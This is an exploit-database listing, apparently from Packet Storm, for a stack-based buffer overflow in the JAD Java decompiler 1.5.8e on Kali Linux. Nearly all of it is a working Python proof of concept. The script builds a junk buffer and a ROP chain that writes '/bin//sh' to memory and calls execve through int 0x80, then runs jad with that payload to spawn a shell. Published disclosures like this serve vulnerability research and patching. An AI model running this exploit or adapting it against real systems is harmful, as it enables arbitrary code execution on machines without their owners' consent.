JAD 1.5.8e-1kali1 Buffer Overflow

🗓️ 26 Jun 2017 00:00:00Reported by Juan SaccoType
packetstorm🔗 packetstormsecurity.com👁 27 Views
JAD 1.5.8e-1kali1 Buffer Overflow in Java Decompile
`#!/usr/bin/python  
# Exploit Author: Juan Sacco <[email protected]> at KPN Red Team -  
http://www.kpn.com  
# Developed using Exploit Pack - http://exploitpack.com -  
<[email protected]>  
# Tested on: GNU/Linux - Kali 2017.1 Release  
#  
# Description: JAD ( Java Decompiler ) 1.5.8e-1kali1 and prior is  
prone to a stack-based buffer overflow  
# vulnerability because the application fails to perform adequate  
boundary-checks on user-supplied input.  
#  
# An attacker could exploit this vulnerability to execute arbitrary code in the  
# context of the application. Failed exploit attempts will result in a  
# denial-of-service condition.  
#  
# Package details:  
# Version: 1.5.8e-1kali1  
# Architecture: all  
# Maintainer: Devon Kearns <[email protected]>  
#  
# Vendor homepage: http://www.varaneckas.com/jad/  
#  
# CANARY : disabled  
# FORTIFY : disabled  
# NX : ENABLED  
# PIE : disabled  
# RELRO : disabled  
#  
import os, subprocess  
from struct import pack  
  
ropchain = "A"*8150 # junk  
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop  
edi ; pop ebp ; ret  
ropchain += pack('<I', 0x0811abe0) # @ .data  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x0807b744) # pop eax ; ret  
ropchain += '/bin'  
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop  
ebx ; pop ebp ; ret  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop  
edi ; pop ebp ; ret  
ropchain += pack('<I', 0x0811abe4) # @ .data + 4  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x0807b744) # pop eax ; ret  
ropchain += '//sh'  
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop  
ebx ; pop ebp ; ret  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop  
edi ; pop ebp ; ret  
ropchain += pack('<I', 0x0811abe8) # @ .data + 8  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop  
ebx ; pop ebp ; ret  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret  
ropchain += pack('<I', 0x0811abe0) # @ .data  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x08067b43) # pop ecx ; ret  
ropchain += pack('<I', 0x0811abe8) # @ .data + 8  
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop  
edi ; pop ebp ; ret  
ropchain += pack('<I', 0x0811abe8) # @ .data + 8  
ropchain += pack('<I', 0x0811abe0) # padding without overwrite ebx  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x41414141) # padding  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080e571f) # inc eax ; ret  
ropchain += pack('<I', 0x080c861f) # int 0x80  
  
try:  
print("[*] JAD 1.5.8 Stack-Based Buffer Overflow by Juan Sacco")  
print("[*] Please wait.. running")  
subprocess.call(["jad", ropchain])  
except OSError as e:  
if e.errno == os.errno.ENOENT:  
print "JAD not found!"  
else:  
print "Error executing exploit"  
raise  
`
26 Jun 2017 00:00Current
0.8Low risk
Vulners AI Score0.8